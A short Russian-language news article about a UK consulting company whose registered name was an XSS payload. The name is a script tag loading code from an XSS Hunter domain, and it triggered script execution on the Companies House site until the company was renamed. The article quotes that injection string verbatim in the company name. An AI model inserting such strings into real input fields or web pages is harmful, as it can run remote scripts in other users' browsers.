Британскую компанию заставили сменить название — оно провоцировало атаки на сайты

Консалтинговую компанию «“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD» основал британский разработчик — название казалось ему забавным и, как он думал, будет способствовать развитию бизнеса.

Позже было установлено, что имя делало сайт Регистрационной палаты уязвимым к XSS-атакам (межсайтовый скриптинг). В ходе таких атак хакеры могут внедрять в веб-страницы вредоносный код, выполняющийся на пользовательском устройстве при открытии страницы.

Сайты, которые некорректно обрабатывают HTML-код, из-за первых двух символов “ и > названия по ошибке считали его пустым. Далее они загружали и выполняли скрипт с платформы XSS Hunter, которая помогает разработчикам искать XSS-уязвимости.

Скрипт выводил безобидное уведомление. Но сама возможность его появления говорит о том, ошибку могут эксплуатировать киберпреступники, чтобы нанести более серьёзный ущерб.

По словам основателя компании, пожелавшего остаться анонимным, кавычки и угловые скобки допускаются нормами агентства и встречаются в других шутливых наименованиях компаний. Поэтому он думал, что его название не станет проблемой, а агентство предприняло меры для предотвращения подобных инцидентов.

Компания уже получила новое имя: теперь она называется «THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD» (Компания, в названии которой были HTML-теги).